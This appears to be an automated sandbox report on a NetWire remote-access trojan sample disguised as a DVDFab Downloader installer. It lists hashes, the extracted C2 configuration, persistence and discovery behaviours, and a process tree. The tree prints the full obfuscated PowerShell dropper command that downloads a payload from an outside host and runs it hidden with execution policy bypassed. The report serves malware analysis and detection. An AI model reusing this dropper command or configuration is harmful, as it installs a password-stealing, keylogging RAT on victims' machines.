netwire | 27c9db8522cd901fa26180e4b1ad2f0ecb63afa2ddeb8595a2a8cf07cb04160d

Analysis

max time kernel
146s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23-12-2024 18:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0C66BCEB98FEEC7DF1330747AA58AB43912F761BAE263ED1C30CF17301DA6D12.exe
Size

167.9MB
MD5

3d2734b540298eb8db6d34908bf3187a
SHA1

3b76909517bb5ffbedb702a5107f67d68a842faa
SHA256

0c66bceb98feec7df1330747aa58ab43912f761bae263ed1c30cf17301da6d12
SHA512

130508961df715bb6e721b79ce29d31469b03250c90d9a0f593b4c545836f7b9ed735d9c03c641921f8ab953033a268a51e9167eb89c9b7550b2c6c765f2c548
SSDEEP

3145728:dqL+KfR/HQDWlnTJMf9XQcxePhX3vT5zm9XkPPQdjRC64g9u/4aIugUZxin8FKjO:Yhf5QDGntMfZ8XlYkQdj19WRIXmImMU

Score

10^/10

netwire botnet discovery execution persistence rat stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://i.top4top.io/m_1891i29ay1.mp4

Extracted

Family

netwire

alice2019.myftp.biz:3360

Attributes

activex_autorun
false
copy_executable
false
delete_original
false
host_id
FRAPPE2021
lock_executable
false
offline_keylogger
false
password
Password
registry_autorun
false
use_mutex
false

Signatures

NetWire RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/memory/3712-188-0x0000000000400000-0x000000000042B000-memory.dmp	netwire
behavioral2/memory/3712-189-0x0000000000400000-0x000000000042B000-memory.dmp	netwire

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire
Netwire family
netwire

Blocklisted process makes network request 1 IoCs

flow	pid	Process
16	3224	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3224	powershell.exe
3568	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	0C66BCEB98FEEC7DF1330747AA58AB43912F761BAE263ED1C30CF17301DA6D12.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	setup.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Installation.js	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
3176	setup.exe
1428	setup.exe
6836	DVDFab Downloader.exe

Loads dropped DLL 17 IoCs

pid	Process
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YouTubeToMP3 = "\"C:\\Program Files (x86)\\DVDFab Downloader\\DVDFab Downloader.exe\" mode=StartWhenPowerUp"	DVDFab Downloader.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3568 set thread context of 3712	3568	powershell.exe	98

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\tcl\tcl8.6\tzdata\America\Pangnirtung	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\tcl\tk8.6\demos\images\earth.gif	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\tcl\tk8.6\icons.tcl	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\my_resource\website_home\imgs\audible.png	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\my_resource\website_home\imgs\website\XVIDEOS.png	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\site-packages\setuptools\__pycache__\version.cpython-37.pyc	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\crashers\bogus_code_obj.py	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\decimaltestdata\ddAbs.decTest	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\tcl\tk8.6\spinbox.tcl	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\QtQuick\Controls.2\Imagine\Switch.qml	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\tcl\tcl8.6\tzdata\America\Tortola	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\tcl\tcl8.6\tzdata\Etc\GMT-4	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\QLanguage\ReportQt_HUN.qm	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\distutils\bcppcompiler.py	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\encodings\koi8_u.py	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\pipes.py	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\site-packages\pip\_vendor\html5lib\treewalkers\__pycache__\etree.cpython-37.pyc	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\cjkencodings\iso2022_kr.txt	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\system\players\dvdplayer\etc\fonts\conf.d\60-latin.conf	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\inspect.py	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\QtQuick\Controls\Private\TreeViewItemDelegateLoader.qmlc	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\QtQuick\Controls\StackViewDelegate.qml	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\YoutubeToMP3\api-ms-win-crt-string-l1-1-0.dll	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\tcl\tcl8.6\tzdata\Asia\Krasnoyarsk	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\python.exe	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\QtQuick\Dialogs\Private	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\include\pymath.h	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\lib2to3\tests\data\bom.py	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\test_descrtut.py	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\test_importlib\extension\test_case_sensitivity.py	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\test_posixpath.py	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\QtQuick\Dialogs\DefaultDialogWrapper.qmlc	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\QtQuick\Extras\designer\CircularGaugeSpecifics.qml	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\site-packages\pip\_internal\models\__pycache__	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\QtQuick\Controls\Styles\Desktop	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\site-packages\pip\_vendor\pkg_resources\__pycache__\py31compat.cpython-37.pyc	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\site-packages\setuptools\command\__init__.py	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\test_locale.py	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\decimaltestdata\dsEncode.decTest	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\site-packages\pip\_internal\commands\__pycache__\check.cpython-37.pyc	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\site-packages\pip\_internal\distributions\sdist.py	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\site-packages\pip\_vendor\chardet\__pycache__\__init__.cpython-37.pyc	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\site-packages\pip\_vendor\urllib3\util\__pycache__\request.cpython-37.pyc	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\site-packages\setuptools\command\__pycache__\saveopts.cpython-37.pyc	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\test_peepholer.py	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\test_wait3.py	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\tcl\tcl8.6\tzdata\Europe\Vilnius	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\idlelib\config-highlight.def	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\idlelib\macosx.py	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\site-packages\html5lib-1.1.dist-info\METADATA	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\site-packages\pip\_vendor\html5lib\treeadapters\__pycache__\genshi.cpython-37.pyc	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\ssl_key.passwd.pem	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Tools\scripts\crlf.py	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\QtQuick\Controls.2\RadioDelegate.qml	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\opcode.py	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\test_asyncio\test_streams.py	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\test_tools\test_sundry.py	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\tcl\tcl8.6\tzdata\Etc\GMT+4	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\tcl\tk8.6\listbox.tcl	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\asyncio\__pycache__\runners.cpython-37.pyc	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\distutils\tests\test_build_py.py	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\site-packages\pip\_internal\operations\build\__pycache__\wheel.cpython-37.pyc	setup.exe
File opened for modification	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\decimaltestdata\dqEncode.decTest	setup.exe
File created	C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\tcl\tcl8.6\tzdata\Antarctica\McMurdo	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DVDFab Downloader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TASKKILL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TASKKILL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TASKKILL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TASKKILL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0C66BCEB98FEEC7DF1330747AA58AB43912F761BAE263ED1C30CF17301DA6D12.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
5720	TASKKILL.exe
5680	TASKKILL.exe
7148	TASKKILL.exe
5880	TASKKILL.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	0C66BCEB98FEEC7DF1330747AA58AB43912F761BAE263ED1C30CF17301DA6D12.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
6836	DVDFab Downloader.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3224	powershell.exe
3224	powershell.exe
3568	powershell.exe
3568	powershell.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
1428	setup.exe
3256	msedge.exe
3256	msedge.exe
1428	setup.exe
1428	setup.exe
6768	msedge.exe
6768	msedge.exe
1428	setup.exe
1428	setup.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeDebugPrivilege	3568	powershell.exe
Token: SeRestorePrivilege	1428	setup.exe
Token: 35	1428	setup.exe
Token: SeSecurityPrivilege	1428	setup.exe
Token: SeSecurityPrivilege	1428	setup.exe
Token: SeDebugPrivilege	7148	TASKKILL.exe
Token: SeDebugPrivilege	5680	TASKKILL.exe
Token: SeDebugPrivilege	5720	TASKKILL.exe
Token: SeDebugPrivilege	5880	TASKKILL.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe
6768	msedge.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3176	setup.exe
1428	setup.exe
6836	DVDFab Downloader.exe
6836	DVDFab Downloader.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3728 wrote to memory of 2624	3728	0C66BCEB98FEEC7DF1330747AA58AB43912F761BAE263ED1C30CF17301DA6D12.exe	84
PID 3728 wrote to memory of 2624	3728	0C66BCEB98FEEC7DF1330747AA58AB43912F761BAE263ED1C30CF17301DA6D12.exe	84
PID 3728 wrote to memory of 2624	3728	0C66BCEB98FEEC7DF1330747AA58AB43912F761BAE263ED1C30CF17301DA6D12.exe	84
PID 2624 wrote to memory of 3224	2624	WScript.exe	85
PID 2624 wrote to memory of 3224	2624	WScript.exe	85
PID 2624 wrote to memory of 3224	2624	WScript.exe	85
PID 3728 wrote to memory of 3176	3728	0C66BCEB98FEEC7DF1330747AA58AB43912F761BAE263ED1C30CF17301DA6D12.exe	87
PID 3728 wrote to memory of 3176	3728	0C66BCEB98FEEC7DF1330747AA58AB43912F761BAE263ED1C30CF17301DA6D12.exe	87
PID 3728 wrote to memory of 3176	3728	0C66BCEB98FEEC7DF1330747AA58AB43912F761BAE263ED1C30CF17301DA6D12.exe	87
PID 3176 wrote to memory of 1428	3176	setup.exe	90
PID 3176 wrote to memory of 1428	3176	setup.exe	90
PID 3176 wrote to memory of 1428	3176	setup.exe	90
PID 3224 wrote to memory of 3568	3224	powershell.exe	95
PID 3224 wrote to memory of 3568	3224	powershell.exe	95
PID 3224 wrote to memory of 3568	3224	powershell.exe	95
PID 3568 wrote to memory of 1528	3568	powershell.exe	96
PID 3568 wrote to memory of 1528	3568	powershell.exe	96
PID 3568 wrote to memory of 1528	3568	powershell.exe	96
PID 1528 wrote to memory of 3004	1528	csc.exe	97
PID 1528 wrote to memory of 3004	1528	csc.exe	97
PID 1528 wrote to memory of 3004	1528	csc.exe	97
PID 3568 wrote to memory of 3712	3568	powershell.exe	98
PID 3568 wrote to memory of 3712	3568	powershell.exe	98
PID 3568 wrote to memory of 3712	3568	powershell.exe	98
PID 3568 wrote to memory of 3712	3568	powershell.exe	98
PID 3568 wrote to memory of 3712	3568	powershell.exe	98
PID 3568 wrote to memory of 3712	3568	powershell.exe	98
PID 3568 wrote to memory of 3712	3568	powershell.exe	98
PID 3568 wrote to memory of 3712	3568	powershell.exe	98
PID 3568 wrote to memory of 3712	3568	powershell.exe	98
PID 3568 wrote to memory of 3712	3568	powershell.exe	98
PID 1428 wrote to memory of 6768	1428	setup.exe	112
PID 1428 wrote to memory of 6768	1428	setup.exe	112
PID 6768 wrote to memory of 6828	6768	msedge.exe	114
PID 6768 wrote to memory of 6828	6768	msedge.exe	114
PID 1428 wrote to memory of 6836	1428	setup.exe	113
PID 1428 wrote to memory of 6836	1428	setup.exe	113
PID 1428 wrote to memory of 6836	1428	setup.exe	113
PID 6836 wrote to memory of 7148	6836	DVDFab Downloader.exe	115
PID 6836 wrote to memory of 7148	6836	DVDFab Downloader.exe	115
PID 6836 wrote to memory of 7148	6836	DVDFab Downloader.exe	115
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116
PID 6768 wrote to memory of 2884	6768	msedge.exe	116

C:\Users\Admin\AppData\Local\Temp\0C66BCEB98FEEC7DF1330747AA58AB43912F761BAE263ED1C30CF17301DA6D12.exe
"C:\Users\Admin\AppData\Local\Temp\0C66BCEB98FEEC7DF1330747AA58AB43912F761BAE263ED1C30CF17301DA6D12.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3728
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\IDXDS2021FR.vbs"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2624
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXECUTIONPOLICY REMOTESIGNED -COMMAND IEX ([System.Text.Encoding]::UTF8.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,13,10,91,83,116,114,105,110,103,93,32,36,80,97,116,104,32,61,32,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,69,110,118,105,114,111,110,40,34,84,69,77,80,34,41,32,43,32,34,92,83,121,115,116,101,109,83,101,99,117,114,105,116,121,51,50,46,80,83,49,34,13,10,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,78,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,32,34,68,111,119,110,108,111,97,100,70,105,108,101,34,44,32,49,44,32,32,64,40,39,104,116,116,112,115,58,47,47,105,46,116,111,112,52,116,111,112,46,105,111,47,109,95,49,56,57,49,105,50,57,97,121,49,46,109,112,52,39,44,32,36,80,97,116,104,41,41,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,48,41,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,70,105,108,101,32,36,80,97,116,104,34)))
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3224
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Admin\AppData\Local\Temp\SystemSecurity32.PS1
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops startup file
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3568
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\odpfpbbd\odpfpbbd.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1528
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD97.tmp" "c:\Users\Admin\AppData\Local\Temp\odpfpbbd\CSC5AB984A08D304B1583E4B87583651A2B.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3004
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3712
- C:\Program Files (x86)\DVDFab Downloader\DVDFab Downloader\setup.exe
  "C:\Program Files (x86)\DVDFab Downloader\DVDFab Downloader\setup.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3176
- - C:\Users\Admin\AppData\Local\Temp\{5121782B-7216-4595-9CC0-C5F9ED6C47B0}\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\{5121782B-7216-4595-9CC0-C5F9ED6C47B0}\setup.exe" /install /file"C:\Program Files (x86)\DVDFab Downloader\DVDFab Downloader\setup.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.dvdfab.cn/thankyou.htm?client_m=NmEtYWMtYTMtOTItMTctZTA=&s=downloader&v=3.0.1.6
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:6768
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0x40,0x124,0x7ffed00c46f8,0x7ffed00c4708,0x7ffed00c4718
        5⤵
        
        PID:6828
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
